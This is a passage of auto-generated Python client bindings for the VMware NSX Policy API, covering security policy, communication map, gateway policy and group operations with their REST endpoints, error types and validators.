class SecurityPolicies(VapiInterface):
"""
"""
REVISE_OPERATION_TOP = "insert_top"
"""
Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
"""
REVISE_OPERATION_BOTTOM = "insert_bottom"
"""
Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
"""
REVISE_OPERATION_AFTER = "insert_after"
"""
Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
"""
REVISE_OPERATION_BEFORE = "insert_before"
"""
Possible value for ``operation`` of method :func:`SecurityPolicies.revise`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.security_policies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _SecurityPoliciesStub)
self._VAPI_OPERATION_IDS = {}
def delete(self,
domain_id,
security_policy_id,
):
"""
Deletes the security policy along with all the rules
:type domain_id: :class:`str`
:param domain_id: (required)
:type security_policy_id: :class:`str`
:param security_policy_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'domain_id': domain_id,
'security_policy_id': security_policy_id,
})
def get(self,
domain_id,
security_policy_id,
):
"""
Read security policy for a domain.
:type domain_id: :class:`str`
:param domain_id: (required)
:type security_policy_id: :class:`str`
:param security_policy_id: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
:return: com.vmware.nsx_policy.model.SecurityPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'domain_id': domain_id,
'security_policy_id': security_policy_id,
})
def list(self,
domain_id,
cursor=None,
include_mark_for_delete_objects=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List all security policies for a domain.
:type domain_id: :class:`str`
:param domain_id: (required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_mark_for_delete_objects: :class:`bool` or ``None``
:param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicyListResult`
:return: com.vmware.nsx_policy.model.SecurityPolicyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'domain_id': domain_id,
'cursor': cursor,
'include_mark_for_delete_objects': include_mark_for_delete_objects,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def patch(self,
domain_id,
security_policy_id,
security_policy,
):
"""
Patch the security policy for a domain. If a security policy for the
given security-policy-id is not present, the object will get created
and if it is present it will be updated. This is a full replace
:type domain_id: :class:`str`
:param domain_id: (required)
:type security_policy_id: :class:`str`
:param security_policy_id: (required)
:type security_policy: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
:param security_policy: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('patch',
{
'domain_id': domain_id,
'security_policy_id': security_policy_id,
'security_policy': security_policy,
})
def revise(self,
domain_id,
security_policy_id,
security_policy,
anchor_path=None,
operation=None,
):
"""
This is used to set a precedence of a security policy w.r.t others.
:type domain_id: :class:`str`
:param domain_id: (required)
:type security_policy_id: :class:`str`
:param security_policy_id: (required)
:type security_policy: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
:param security_policy: (required)
:type anchor_path: :class:`str` or ``None``
:param anchor_path: The security policy/rule path if operation is 'insert_after' or
'insert_before' (optional)
:type operation: :class:`str` or ``None``
:param operation: Operation (optional, default to insert_top)
:rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
:return: com.vmware.nsx_policy.model.SecurityPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('revise',
{
'domain_id': domain_id,
'security_policy_id': security_policy_id,
'security_policy': security_policy,
'anchor_path': anchor_path,
'operation': operation,
})
def update(self,
domain_id,
security_policy_id,
security_policy,
):
"""
Create or Update the security policy for a domain. This is a full
replace. All the rules are replaced.
:type domain_id: :class:`str`
:param domain_id: (required)
:type security_policy_id: :class:`str`
:param security_policy_id: (required)
:type security_policy: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
:param security_policy: (required)
:rtype: :class:`com.vmware.nsx_policy.model_client.SecurityPolicy`
:return: com.vmware.nsx_policy.model.SecurityPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'domain_id': domain_id,
'security_policy_id': security_policy_id,
'security_policy': security_policy,
})
class _CommunicationMapsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'communication_map_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps/{communication-map-id}',
path_variables={
'domain_id': 'domain-id',
'communication_map_id': 'communication-map-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'communication_map_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps/{communication-map-id}',
path_variables={
'domain_id': 'domain-id',
'communication_map_id': 'communication-map-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps',
path_variables={
'domain_id': 'domain-id',
},
query_parameters={
'cursor': 'cursor',
'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for patch operation
patch_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'communication_map_id': type.StringType(),
'communication_map': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMap'),
})
patch_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
patch_input_value_validator_list = [
HasFieldsOfValidator()
]
patch_output_validator_list = [
]
patch_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps/{communication-map-id}',
request_body_parameter='communication_map',
path_variables={
'domain_id': 'domain-id',
'communication_map_id': 'communication-map-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for revise operation
revise_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'communication_map_id': type.StringType(),
'communication_map': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMap'),
'anchor_path': type.OptionalType(type.StringType()),
'operation': type.OptionalType(type.StringType()),
})
revise_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
revise_input_value_validator_list = [
HasFieldsOfValidator()
]
revise_output_validator_list = [
HasFieldsOfValidator()
]
revise_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps/{communication-map-id}?action=revise',
request_body_parameter='communication_map',
path_variables={
'domain_id': 'domain-id',
'communication_map_id': 'communication-map-id',
},
query_parameters={
'anchor_path': 'anchor_path',
'operation': 'operation',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'communication_map_id': type.StringType(),
'communication_map': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMap'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps/{communication-map-id}',
request_body_parameter='communication_map',
path_variables={
'domain_id': 'domain-id',
'communication_map_id': 'communication-map-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMap'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMapListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'patch': {
'input_type': patch_input_type,
'output_type': type.VoidType(),
'errors': patch_error_dict,
'input_value_validator_list': patch_input_value_validator_list,
'output_validator_list': patch_output_validator_list,
'task_type': TaskType.NONE,
},
'revise': {
'input_type': revise_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMap'),
'errors': revise_error_dict,
'input_value_validator_list': revise_input_value_validator_list,
'output_validator_list': revise_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'CommunicationMap'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'patch': patch_rest_metadata,
'revise': revise_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.domains.communication_maps',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _GatewayPoliciesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'gateway_policy_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies/{gateway-policy-id}',
path_variables={
'domain_id': 'domain-id',
'gateway_policy_id': 'gateway-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'gateway_policy_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies/{gateway-policy-id}',
path_variables={
'domain_id': 'domain-id',
'gateway_policy_id': 'gateway-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies',
path_variables={
'domain_id': 'domain-id',
},
query_parameters={
'cursor': 'cursor',
'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for patch operation
patch_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'gateway_policy_id': type.StringType(),
'gateway_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicy'),
})
patch_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
patch_input_value_validator_list = [
HasFieldsOfValidator()
]
patch_output_validator_list = [
]
patch_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies/{gateway-policy-id}',
request_body_parameter='gateway_policy',
path_variables={
'domain_id': 'domain-id',
'gateway_policy_id': 'gateway-policy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for revise operation
revise_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'gateway_policy_id': type.StringType(),
'gateway_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicy'),
'anchor_path': type.OptionalType(type.StringType()),
'operation': type.OptionalType(type.StringType()),
})
revise_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
revise_input_value_validator_list = [
HasFieldsOfValidator()
]
revise_output_validator_list = [
HasFieldsOfValidator()
]
revise_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies/{gateway-policy-id}?action=revise',
request_body_parameter='gateway_policy',
path_variables={
'domain_id': 'domain-id',
'gateway_policy_id': 'gateway-policy-id',
},
query_parameters={
'anchor_path': 'anchor_path',
'operation': 'operation',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'gateway_policy_id': type.StringType(),
'gateway_policy': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicy'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies/{gateway-policy-id}',
request_body_parameter='gateway_policy',
path_variables={
'domain_id': 'domain-id',
'gateway_policy_id': 'gateway-policy-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicy'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicyListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'patch': {
'input_type': patch_input_type,
'output_type': type.VoidType(),
'errors': patch_error_dict,
'input_value_validator_list': patch_input_value_validator_list,
'output_validator_list': patch_output_validator_list,
'task_type': TaskType.NONE,
},
'revise': {
'input_type': revise_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicy'),
'errors': revise_error_dict,
'input_value_validator_list': revise_input_value_validator_list,
'output_validator_list': revise_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'GatewayPolicy'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'patch': patch_rest_metadata,
'revise': revise_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.domains.gateway_policies',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _GroupsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'group_id': type.StringType(),
'fail_if_subtree_exists': type.OptionalType(type.BooleanType()),
'force': type.OptionalType(type.BooleanType()),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/policy/api/v1/infra/domains/{domain-id}/groups/{group-id}',
path_variables={
'domain_id': 'domain-id',
'group_id': 'group-id',
},
query_parameters={
'fail_if_subtree_exists': 'fail_if_subtree_exists',
'force': 'force',
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'group_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/groups/{group-id}',
path_variables={
'domain_id': 'domain-id',
'group_id': 'group-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'domain_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/domains/{domain-id}/groups',
path_variables={
'domain_id': 'domain-id',
},
query_parameters={
'cursor': 'cursor',
'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for patch operation
patch_input_type = type.StructType('operation-input', {
